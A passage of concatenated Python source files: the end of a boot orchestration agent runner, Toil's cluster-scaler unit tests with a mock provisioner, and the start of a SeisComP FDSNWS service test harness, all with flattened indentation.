wait_for_istio_proxy()
try:
operation = os.environ["OPERATION"].lower()
if operation not in VALID_OPERATIONS:
raise NontransientException("{} is not a valid operation: {}. Canceling BOA Session.".format(operation, VALID_OPERATIONS))
session_id = os.environ["SESSION_ID"]
session_template_id = os.environ["SESSION_TEMPLATE_ID"]
session_limit = os.environ["SESSION_LIMIT"]
with open(BOOT_SESSION_FILE, "r") as stream:
try:
session_data = json.load(stream)
except Exception as exc:
LOGGER.error("Unable to read file: %s -- Error: %s",
BOOT_SESSION_FILE, exc)
raise
# Create an Agent for each Boot Set
agents = []
boot_sets = []
LOGGER.debug("Starting with session: %s", session_data)
for bs_name in session_data['boot_sets'].keys():
boot_sets.append(bs_name)
agent = BootSetAgent(session_id, session_template_id, bs_name, operation,
session_limit, BOOT_SESSION_FILE)
agents.append(agent)
except KeyError as ke:
raise TemplateException("Missing required variable: %s" % (ke)) from ke
except InvalidInput as err:
raise TemplateException("Template error: %s" % err) from err
LOGGER.info("**********************************")
LOGGER.info("Session: %s", session_id)
LOGGER.info("Operation: %s", operation)
LOGGER.info("Session Template: %s", session_template_id)
LOGGER.info("Session Limit: %s", session_limit)
LOGGER.info("**********************************")
node_list = set()
# Look up which Boot Set a node is in. Keys are nodes. Boot Sets are values.
boot_set_lookup_by_node = {}
node_lookup_by_boot_set = {}
for agent in agents:
node_lookup_by_boot_set[str(agent.boot_set)] = agent.nodes
node_list |= agent.nodes
for node in agent.nodes:
boot_set_lookup_by_node[node] = agent.boot_set
node_list = list(node_list)
# For the duration of running the agent, keep records of state.
with SessionStatus.CreateOrReference(session_id, boot_sets):
exception_queue = IterableQueue()
boa_threads = [threading.Thread(target=agent, kwargs={'queue': exception_queue})
for agent in agents]
_ = [thread.start() for thread in boa_threads]
_ = [thread.join() for thread in boa_threads]
# When all agents are done, reraise exceptions from any of the threads
for exception_fields in exception_queue:
exception_type, exception_value, exception_traceback = exception_fields
raise NontransientException("Unable to apply boot set operation: %s\n%s\n%s"
% (exception_type, exception_value, exception_traceback))
if __name__ == "__main__":
# Format logs for stdout
_log_level = getattr(logging, os.environ.get('LOG_LEVEL', 'INFO').upper(), logging.INFO)
_stream_handler = logging.StreamHandler()
_stream_handler.setLevel(_log_level)
_stream_handler.setFormatter(logging.Formatter("%(asctime)-15s - %(levelname)-7s - %(name)s - %(message)s"))
LOGGER.addHandler(_stream_handler)
LOGGER.setLevel(_log_level)
LOGGER.debug("BOA starting")
try:
run()
except TransientException:
LOGGER.exception("A recoverable error has been detected; Boot Orchestration Agent is now "
"exiting with a non-zero response to allow for rescheduling. ")
sys.exit(1)
except NontransientException:
LOGGER.exception("Fatal conditions have been detected with this run of Boot Orchestration "
"that are not expected to be recoverable through additional iterations. "
"The application is exiting with a zero status to prevent job rescheduling.")
sys.exit(0)
except Exception as err:
LOGGER.exception("An unanticipated exception occurred during launch: %s; terminating attempt "
"with one for perceived transient error. The following stack should be "
"captured and filed as a bug so that the exception can be classified as "
"recoverable or non-recoverable.", err)
sys.exit(1)
LOGGER.info("BOA completed requested operation.")
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import JobNode, Job
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
be provisioned. If we raise this, as in testLowTargetTime, it will launch 1000 t2.micros.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
self.provisioner = object()
self.provisioner.nodeTypes = ['r3.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [r3_8xlarge,
c4_8xlarge_preemptable]
self.provisioner.setStaticNodes = lambda _, __: None
self.provisioner.retryPredicate = lambda _: False
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 3 (rounded up).
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
# First do simple test of creating 100 preemptable and non-premptable jobs and check the
# jobs are completed okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if preemptable and numPreemptableJobs > 0 or not preemptable and numJobs > 0:
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.cores,
preemptable=False),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.info("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True only return preemptable nodes else return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = Job(memory=jobShape.memory,
cores=jobShape.cores, disk=jobShape.disk,
preemptable=preemptable)
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.info("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.info("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
fdsnwstest.py
|
#!/usr/bin/env python
###############################################################################
# Copyright (C) 2013-2014 by gempa GmbH
#
# Author: Stephan Herrnkind
# Email: herrnkind@gempa.de
###############################################################################
from __future__ import absolute_import, division, print_function
import os
import requests
import signal
import socket
import subprocess
import sys
import time
import traceback
from threading import Thread
if sys.version_info[0] < 3:
from Queue import Queue
else:
from queue import Queue
from datetime import datetime, timedelta
from fdsnws.utils import py3bstr
###############################################################################
class FDSNWSTest:
#--------------------------------------------------------------------------
def __init__(self, port=8080):
self.port = port
self.url = 'http://localhost:{}/fdsnws'.format(self.port)
self.service = None
self.rootdir = os.environ.get('SEISCOMP_ROOT')
self.sharedir = '{}/share/fdsnws'.format(self.rootdir)
#--------------------------------------------------------------------------
def __call__(self):
if not self._startService():
return 1
try:
self.test()
except Exception as e:
traceback.print_exc()
self._stopService()
return 1
self._stopService()
return 0
#--------------------------------------------------------------------------
def _waitForSocket(self, timeout=10):
print('waiting for port {} to become ready '.format(self.port),
end='')
maxTime = datetime.now() + timedelta(timeout)
while self.service is not None and self.service.poll() == None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
res = sock.connect_ex(('127.0.0.1', self.port))
sock.close()
if res == 0:
print(' OK')
return True
if datetime.now() > maxTime:
print(' TIMEOUT EXCEEDED')
return False
time.sleep(0.2)
print('.', end='')
print(' SERVICE TERMINATED')
#--------------------------------------------------------------------------
def _startService(self):
cmd = self.command()
print('starting FDSNWS service:', ' '.join(cmd))
try:
self.fdOut = open('fdsnws.stdout', 'w')
self.fdErr = open('fdsnws.stderr', 'w')
self.service = subprocess.Popen(cmd, stdout=self.fdOut,
stderr=self.fdErr)
except Exception as e:
print('failed to start FDSNWS service:', str(e))
return False
if not self._waitForSocket():
self._stopService()
return False
return True
#--------------------------------------------------------------------------
def _stopService(self, timeout=10):
if self.service.poll() is not None:
print('warning: FDSNWS service terminated ahead of time',
file=sys.stdout)
return
print('stopping FDSNWS service (PID: {}): '.format(self.service.pid),
end='')
maxTime = datetime.now() + timedelta(timeout)
self.service.terminate()
while self.service.poll() == None:
print('.', end='')
time.sleep(0.2)
if datetime.now() > maxTime:
print(' TIMEOUT EXCEEDED, sending kill signal',
file=sys.stdout)
self.service.kill()
return
print(' OK')
#--------------------------------------------------------------------------
def test(self):
pass
#--------------------------------------------------------------------------
def command(self):
return [
'python', '{}/../../fdsnws.py'.format(self.rootdir),
'--debug', '--plugins=dbsqlite3,fdsnxml',
'--database=sqlite3://{}/seiscomp3.sqlite3'.format(self.rootdir),
'--serveAvailability=true', '--dataAvailability.enable=true',
'--agencyID=Test',
'--record-url=sdsarchive://{}/sds'.format(self.rootdir),
'--htpasswd={}/fdsnws.htpasswd'.format(self.rootdir)
]
#--------------------------------------------------------------------------
def diff(self, expected, got, ignoreRanges):
if expected == got:
return (None, None)
lenExp = minLen = maxLen = len(expected)
lenGot = len(got)
for r in ignoreRanges:
if len(r) > 2:
minLen -= r[2]
if len(r) > 3:
maxLen += r[3]
if lenGot == 0 and minLen <= 0:
return (None, None)
if lenGot < minLen or lenGot > maxLen:
return (min(lenExp,lenGot), 'read {} bytes, expected {}'.format(
lenGot, minLen if minLen == maxLen \
